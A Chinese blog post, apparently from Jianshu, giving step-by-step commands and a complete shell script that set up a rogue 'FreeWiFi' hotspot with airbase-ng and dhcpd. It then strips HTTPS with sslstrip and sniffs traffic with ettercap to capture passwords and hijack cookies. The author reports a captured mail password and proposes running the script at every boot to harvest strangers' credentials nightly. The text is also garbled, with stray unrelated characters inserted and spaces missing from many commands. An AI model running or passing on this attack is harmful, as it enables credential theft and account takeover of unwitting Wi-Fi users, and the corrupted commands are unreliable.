之前寫過kali-linux下用 HostAPd+bridge-utils 搭建網(wǎng)橋的方式來創(chuàng)建wifi熱點(diǎn)的日志,有興趣可以在看下不同:
Kali-linux下使用HostAPd創(chuàng)建wifi熱點(diǎn)(AP) - 簡書
這里再介紹一種方法敬扛,是使用 airbase-ng + dhcpd 創(chuàng)建虛擬WiFi熱點(diǎn)泄私;順便使用 sslstrip+ettercap 進(jìn)行中間人攻擊则涯,嗅探使用者的上網(wǎng)信息和劫持cookie瞭吃!
所需要的軟件如下嗜憔;kali-linux都已經(jīng)自帶了木缝,其他的系統(tǒng)可以自行安裝:
Aircrack-ng 套件#用來發(fā)送數(shù)據(jù)
isc-dhcp-server#簡單的dhcp服務(wù)器
sslstrip#突破ssl加密
ettercap#嗅探劫持
leaf /etc/dhcp/dhcpd.conf編輯dhcp服務(wù)器配置文件便锨,修改如下:
authoritative;
default-lease-time700;
max-lease-time8000;
subnet10.0.0.0netmask255.255.255.0{
option routers10.0.0.1;
option subnet-mask255.255.255.0;
option domain-name"FreeWiFi";
option domain-name-servers10.0.0.1;
range10.0.0.1010.0.0.100;
}
然后激活網(wǎng)卡至監(jiān)聽模式:
airmon-ng start wlan0
airbase-ng -e FreeWiFi -c 6 mon0
此時(shí)虛擬wifi的信號已經(jīng)發(fā)送出去了,如果出現(xiàn)錯誤:
Error: Got channel -1, expected a value > 0.
執(zhí)行如下命令:
airmon-ng stop mon0
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
然后從激活網(wǎng)卡至監(jiān)聽模式那里重新開始我碟。
接著執(zhí)行如下命令:
ifconfig at0 up
ifconfig at010.0.0.1netmask255.255.255.0
ifconfig at0 mtu1400
route add-net10.0.0.0netmask255.255.255.0gw10.0.0.1
iptables--flush
iptables--table nat--flush
iptables--delete-chain
iptables--table nat--delete-chain
echo1>/proc/sys/net/ipv4/ip_forward
iptables-t nat-A PREROUTING-p udp-j DNAT--to192.168.1.1
iptables-P FORWARD ACCEPT
iptables--append FORWARD--in-interfaceat0-j ACCEPT
iptables--table nat--append POSTROUTING--out-interfaceeth0-j MASQUERADE
iptables-t nat-A PREROUTING-p tcp--destination-port80-j REDIRECT--to-port10000
dhcpd-cf/etc/dhcp/dhcpd.conf-pf/var/run/dhcpd.pid at0
/etc/init.d/isc-dhcp-server start
虛擬WiFir熱點(diǎn)創(chuàng)建成功放案,接下來就是嗅探欺騙釣魚了:
sslstrip-fpk10000
ettercap-Tpuqiat0
然后就等著魚兒上鉤吧!
手機(jī)上測試了下矫俺,網(wǎng)易郵箱直接明文密碼:
百度使用了加密:
寫了一個腳本吱殉,修改成自己的設(shè)置每次執(zhí)行就ok了:
復(fù)制下面代碼,保存為 “Fake_a_ap.sh”厘托,然后 chmod +x Fake_a_ap.sh && ./Fake_a_ap.sh
#!/bin/sh
echo "即將創(chuàng)建WiFi熱點(diǎn)友雳,請確保dhcpd.conf已經(jīng)配置好!" &
sleep5
ifconfig wlan0 down#wlan0修改成你的網(wǎng)卡
iwconfig wlan0 mode monitor
ifconfig wlan0 up
airmon-ng start wlan0&
sleep5
airbase-ng-eFreeWiFi-c6mon0&#修改成自己的熱點(diǎn)名稱和信道
sleep5
ifconfig at0 up
ifconfig at010.0.0.1netmask255.255.255.0
ifconfig at0 mtu1400
route add-net10.0.0.0netmask255.255.255.0gw10.0.0.1
iptables--flush&&iptables--table nat--flush&&iptables--table nat--flush&&iptables--table nat--delete-chain&
echo1>/proc/sys/net/ipv4/ip_forward
iptables-t nat-A PREROUTING-p udp-j DNAT--to192.168.1.1
iptables-P FORWARD ACCEPT
iptables--append FORWARD--in-interfaceat0-j ACCEPT
iptables--table nat--append POSTROUTING--out-interfaceeth0-j MASQUERADE
iptables-t nat-A PREROUTING-p tcp--destination-port80-j REDIRECT--to-port10000
dhcpd-cf/etc/dhcp/dhcpd.conf-pf/var/run/dhcpd.pid at0
sleep2
/etc/init.d/isc-dhcp-server start&
sleep5
sslstrip-fpk10000&
ettercap-puTqi at0
當(dāng)然還可以更加淫蕩铅匹!簡單Ettercap 使用進(jìn)階(1):詳細(xì)參數(shù):設(shè)置成將數(shù)據(jù)包保存到本地押赊,然后再把這個腳本添加到“啟動應(yīng)用程序”里或者Kali-linux 定時(shí)執(zhí)行任務(wù)Crontab的簡單設(shè)置 - 簡書,讓它隨系統(tǒng)啟動包斑,流礁,,然后就沒有然后了:每天睡覺前打開數(shù)據(jù)包檢查下里面的username罗丰,passwd神帅,cookie,丸卷,etc枕稀,,谜嫉,萎坷,